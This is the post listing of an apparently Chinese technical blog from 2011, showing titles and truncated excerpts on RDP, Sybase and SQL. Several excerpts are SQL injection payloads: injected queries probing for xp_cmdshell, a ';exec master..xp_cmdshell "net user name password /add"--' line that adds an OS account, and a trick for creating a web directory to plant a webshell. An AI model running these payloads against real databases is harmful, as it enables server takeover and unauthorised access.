- 博客(9)
- 资源 (8)
- 收藏
- 关注
转载 Vulnerability Summary for CVE-2005-1794 RDP
Vulnerability Summary for CVE-2005-1794 Original release date:06/01/2005Last revised:09/05/2008 Source: US-CERT/NISTOverviewMicrosoft Terminal Server using Remote Desktop Protocol (RDP) 5.
2011-06-14 11:31:00 3579
原创 sybase download
http://www.sybase.com/detail?id=1051287&elq=00000000000000000000000000000000
2011-06-09 22:15:00 1178
转载 sql 相关
目前现在一个进程中创建一个临时表,在另外一个进程中读取,是不是能用#开头的临时表。是不是通一个进程创建临时表,关闭数据库连接,重新打开数据库连接,在新的连接中还是不能访问临时表? 目前现在一个进程中创建一个临时表,在另外一个进程中读取,是不是能用#开头的临时表。是不是通一个进程创建临时表,关闭数据库连接,重新打开数据库连接,在新的连接
2011-06-08 13:07:00 608
原创 sybase
http://www.sybase.com/products/databasemanagement/sqlanywhere http://www.sybase.com/detail?id=1080011
2011-06-07 12:45:00 547
转载 SQL注入建立虚拟目录,免得找Web绝对路径!
SQL注入建立虚拟目录,免得找Web绝对路径! 文章录入:7747.Net 责任编辑:7747.Net 更新时间:2006-4-6 8:16:46 24 【字体:小 大】 我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: exec master.dbo.xp_cmdshell ’cscript C
2011-06-06 10:13:00 1056 1
原创 Sybase内的MS SQL Server 注入技术
14.3 Sybase内的MS SQL Server 注入技术有大量的关于Microsoft SQL Server应用程序内SQL注入的文章被发表,这是因为Sybase 和MS SQL Server有共同的来源,值得快速研究一下这个著名的技术和其在Sybase内的工作方式。14.3.1 注释Sybase使用“--”和“/*”注释风格,这种方式与MS SQL Server非常一致,因此可以利
2011-06-06 10:00:00 2032
原创 Sql 注入
xp_cmdshell这个模块给删除了需要上传xplog70.dll这个文件一、xp_cmdshell的删除及恢复1、判断xp_cmdshell是否存在and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)select count(*) from master.dbo
2011-06-06 09:57:00 471
原创 sql 注入攻击
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
2011-06-06 09:57:00 700
转载 MS SQL 注入
--是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = x and name = xp_cmdshell) --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name password /add"-- ;exec maste
2011-06-04 11:21:00 660
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人